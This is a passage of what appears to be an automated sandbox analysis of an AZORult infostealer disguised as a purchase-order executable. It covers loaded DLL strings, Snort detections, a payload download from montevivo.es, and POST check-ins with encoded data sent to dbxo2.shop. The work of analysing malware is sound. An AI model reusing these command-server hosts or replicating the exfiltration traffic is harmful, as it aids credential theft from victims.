                    Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: PO No. 3200005919.exe, 00000005.00000003.7195041195.000000001E63C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7194158681.000000001E634000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7194634564.000000001E638000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7151568728.000000001DCB4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7193638820.000000001E630000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7195289045.000000001E640000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-profile-l1-1-0.dll.5.dr
                    Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: PO No. 3200005919.exe, 00000005.00000003.7198074012.000000001D920000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7199061062.000000001D924000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-time-l1-1-0.dll.5.dr
                    Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb-- source: PO No. 3200005919.exe, 00000005.00000003.7208087648.000000001DA10000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201261462.000000001D9D0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7183429342.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7183128266.000000001DCC8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7211428448.000000001DB40000.00000004.00001000.00020000.00000000.sdmp, nssdbm3.dll.5.dr
                    Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: PO No. 3200005919.exe, 00000005.00000003.7192860880.000000001E610000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-handle-l1-1-0.dll.5.dr
                    Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: PO No. 3200005919.exe, 00000005.00000003.7195041195.000000001E63C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7194158681.000000001E634000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7195525464.000000001E644000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7194634564.000000001E638000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7153506909.000000001DCB4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7195985940.000000001E64C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7193638820.000000001E630000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7195289045.000000001E640000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7154557567.000000001DCB8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7195774303.000000001E648000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7196171931.000000001E654000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-synch-l1-2-0.dll.5.dr
                    Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: PO No. 3200005919.exe, 00000005.00000003.7194158681.000000001E634000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7193638820.000000001E630000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-processenvironment-l1-1-0.dll.5.dr
                    Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: PO No. 3200005919.exe, 00000005.00000003.7137545133.000000001DCB4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7192063322.000000001E5F0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-datetime-l1-1-0.dll.5.dr
                    Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: PO No. 3200005919.exe, 00000005.00000003.7195041195.000000001E63C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7194158681.000000001E634000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7195525464.000000001E644000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7157618680.000000001DCB4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7194634564.000000001E638000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7196659326.000000001E664000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7196318925.000000001E658000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7195985940.000000001E64C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7193638820.000000001E630000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7195289045.000000001E640000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7195774303.000000001E648000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7196442274.000000001E65C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7156953736.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7196171931.000000001E654000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7196550840.000000001E660000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-conio-l1-1-0.dll.5.dr
                    Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: PO No. 3200005919.exe, 00000005.00000003.7161475490.000000001DCBC000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7161350303.000000001DCB8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7197174638.000000001E688000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7197291781.000000001E68C000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-math-l1-1-0.dll.5.dr
                    Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: PO No. 3200005919.exe, 00000005.00000003.7193344870.000000001E61C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7192860880.000000001E610000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7193449641.000000001E620000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7193081967.000000001E614000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7145957838.000000001DCB4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7145338066.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7193218179.000000001E618000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-localization-l1-2-0.dll.5.dr
                    Source: Binary string: qipcap.pdb0 source: PO No. 3200005919.exe, 00000001.00000002.7112633568.000000000040A000.00000004.00000001.01000000.00000003.sdmp, PO No. 3200005919.exe, 00000001.00000002.7114872753.000000000289B000.00000004.00000800.00020000.00000000.sdmp, qipcap.dll.1.dr
                    Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: PO No. 3200005919.exe, 00000005.00000003.7185437486.000000001DCC0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7185063204.000000001DCE8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7208087648.000000001DA10000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201261462.000000001D9D0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7183429342.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7213087314.000000001DB58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7211428448.000000001DB40000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.5.dr
                    Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: PO No. 3200005919.exe, 00000005.00000003.7195041195.000000001E63C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7194158681.000000001E634000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7194634564.000000001E638000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7193638820.000000001E630000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-processthreads-l1-1-1.dll.5.dr
                    Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: PO No. 3200005919.exe, 00000005.00000003.7193638820.000000001E630000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7147239448.000000001DCBC000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7147080304.000000001DCB8000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-namedpipe-l1-1-0.dll.5.dr
                    Source: Binary string: vcruntime140.i386.pdb source: PO No. 3200005919.exe, 00000005.00000003.7191720901.000000001DCC8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7216382572.000000001DC98000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, vcruntime140.dll.5.dr
                    Source: Binary string: api-ms-win-crt-multibyte-l1-1-0.pdb source: PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7197360510.000000001E698000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7162088614.000000001DCB8000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-multibyte-l1-1-0.dll.5.dr
                    Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: PO No. 3200005919.exe, 00000005.00000003.7198074012.000000001D920000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7199061062.000000001D924000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7199694393.000000001D928000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7168388100.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-utility-l1-1-0.dll.5.dr
                    Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: PO No. 3200005919.exe, 00000005.00000003.7195041195.000000001E63C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7194158681.000000001E634000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7195525464.000000001E644000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7194634564.000000001E638000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7193638820.000000001E630000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7195289045.000000001E640000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-rtlsupport-l1-1-0.dll.5.dr
                    Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: PO No. 3200005919.exe, 00000005.00000003.7195041195.000000001E63C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7194158681.000000001E634000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7195525464.000000001E644000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7194634564.000000001E638000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7196318925.000000001E658000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7195985940.000000001E64C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7193638820.000000001E630000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7195289045.000000001E640000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7195774303.000000001E648000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7196442274.000000001E65C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7196171931.000000001E654000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-timezone-l1-1-0.dll.5.dr
                    Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb source: PO No. 3200005919.exe, 00000005.00000003.7208087648.000000001DA10000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201261462.000000001D9D0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7183429342.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7183128266.000000001DCC8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7211428448.000000001DB40000.00000004.00001000.00020000.00000000.sdmp, nssdbm3.dll.5.dr
                    Source: Binary string: msvcp140.i386.pdbGCTL source: PO No. 3200005919.exe, 00000005.00000003.7207591372.000000001D9A8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7174962411.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7174178046.000000001D3C4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, msvcp140.dll.5.dr
                    Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: PO No. 3200005919.exe, 00000005.00000003.7195041195.000000001E63C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7194158681.000000001E634000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7195525464.000000001E644000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7194634564.000000001E638000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7193638820.000000001E630000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7195289045.000000001E640000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7195774303.000000001E648000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7152463127.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-string-l1-1-0.dll.5.dr
                    Source: Binary string: D:\Kelly1076\__HITDisplay__\00_Code\ProArt Code_Git\ProArt\x64\Release\WMIMethod.pdb source: PO No. 3200005919.exe, 00000001.00000002.7112633568.000000000040A000.00000004.00000001.01000000.00000003.sdmp, PO No. 3200005919.exe, 00000001.00000002.7114872753.000000000289B000.00000004.00000800.00020000.00000000.sdmp, WMIMethod.dll.1.dr
                    Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: PO No. 3200005919.exe, 00000005.00000003.7192792717.000000001E604000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7192477101.000000001E5F8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7141392781.000000001DCB8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7192708827.000000001E600000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7192605806.000000001E5FC000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7141563170.000000001DCBC000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7192063322.000000001E5F0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7192298891.000000001E5F4000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-file-l2-1-0.dll.5.dr
                    Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: PO No. 3200005919.exe, 00000005.00000003.7197871193.000000001E6B0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7197668078.000000001E69C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7197360510.000000001E698000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-process-l1-1-0.dll.5.dr
                    Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: PO No. 3200005919.exe, 00000005.00000003.7193344870.000000001E61C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7192860880.000000001E610000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7193081967.000000001E614000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7145338066.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7193218179.000000001E618000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-libraryloader-l1-1-0.dll.5.dr
                    Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: PO No. 3200005919.exe, 00000005.00000003.7192860880.000000001E610000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7193081967.000000001E614000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7193218179.000000001E618000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-interlocked-l1-1-0.dll.5.dr
                    Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: PO No. 3200005919.exe, 00000005.00000003.7196731869.000000001E670000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7159539905.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7160196459.000000001DCB4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7197102801.000000001E67C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7196892223.000000001E674000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7197003158.000000001E678000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-heap-l1-1-0.dll.5.dr
                    Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: PO No. 3200005919.exe, 00000005.00000003.7166478515.000000001DCBC000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7198074012.000000001D920000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7165324032.000000001DCB4000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-string-l1-1-0.dll.5.dr
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_00402862 FindFirstFileW,1_2_00402862
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_004066F3 FindFirstFileW,FindClose,1_2_004066F3
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_00405ABE CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,1_2_00405ABE

                    Networking

                    barindex
                    Source: TrafficSnort IDS: 2029468 ET TROJAN Win32/AZORult V3.3 Client Checkin M15 192.168.11.20:49830 -> 104.21.2.6:80
                    Source: TrafficSnort IDS: 2029137 ET TROJAN AZORult v3.3 Server Response M2 104.21.2.6:80 -> 192.168.11.20:49830
                    Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                    Source: global trafficHTTP traffic detected: GET /lPkFJXszrxOMoP0.hhp HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: montevivo.esCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST /dbx2/index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Host: dbxo2.shopContent-Length: 111Cache-Control: no-cacheData Raw: 00 00 00 41 70 9d 32 13 8b 30 60 8b 30 63 8b 30 6c 8b 30 67 8b 30 67 8b 31 11 8b 30 6c 8b 30 61 8b 30 64 8b 30 61 8b 30 6c 8b 30 65 8b 30 62 ef 26 67 ea 42 70 9d 35 70 9d 32 10 8b 30 64 8b 30 60 eb 45 70 9c 47 10 8b 30 64 ef 26 66 97 26 66 9d 42 70 9d 37 70 9d 36 70 9c 47 70 9d 35 70 9d 37 70 9d 33 13 ec 26 66 9a 26 66 9e 26 66 98 Data Ascii: Ap20`0c0l0g0g10l0a0d0a0l0e0b&gBp5p20d0`EpG0d&f&fBp7p6pGp5p7p3&f&f&f
                    Source: global trafficHTTP traffic detected: POST /dbx2/index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Host: dbxo2.shopContent-Length: 23000Cache-Control: no-cache
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: PO No. 3200005919.exe, 00000005.00000002.7267996696.000000001D8D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: HTTPS://LOGIN.LIVE.COM/
                    Source: PO No. 3200005919.exe, 00000001.00000002.7112633568.000000000040A000.00000004.00000001.01000000.00000003.sdmp, PO No. 3200005919.exe, 00000001.00000002.7114872753.000000000289B000.00000004.00000800.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7198074012.000000001D920000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7199061062.000000001D924000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7177302038.000000001E6C0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7170103702.000000001D3C4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7170941292.000000001DCB4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7185437486.000000001DCC0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7199694393.000000001D928000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201066945.000000001D980000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7168388100.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7172137254.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7185063204.000000001DCE8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7208087648.000000001DA10000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201261462.000000001D9D0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7183429342.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7188963391.000000001DCE4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7183128266.000000001DCC8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7180029711.0000000000060000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7200410147.000000001D92C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                    Source: PO No. 3200005919.exe, 00000001.00000002.7114872753.000000000289B000.00000004.00000800.00020000.00000000.sdmp, WMIMethod.dll.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
                    Source: PO No. 3200005919.exe, 00000001.00000002.7112633568.000000000040A000.00000004.00000001.01000000.00000003.sdmp, PO No. 3200005919.exe, 00000001.00000002.7114872753.000000000289B000.00000004.00000800.00020000.00000000.sdmp, WMIMethod.dll.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
                    Source: PO No. 3200005919.exe, 00000001.00000002.7112633568.000000000040A000.00000004.00000001.01000000.00000003.sdmp, PO No. 3200005919.exe, 00000001.00000002.7114872753.000000000289B000.00000004.00000800.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7214861281.000000001DB7C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7198074012.000000001D920000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7199061062.000000001D924000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7177302038.000000001E6C0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7170103702.000000001D3C4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7170941292.000000001DCB4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7185437486.000000001DCC0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7199694393.000000001D928000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201066945.000000001D980000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7168388100.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7172137254.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7185063204.000000001DCE8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7208087648.000000001DA10000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201261462.000000001D9D0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 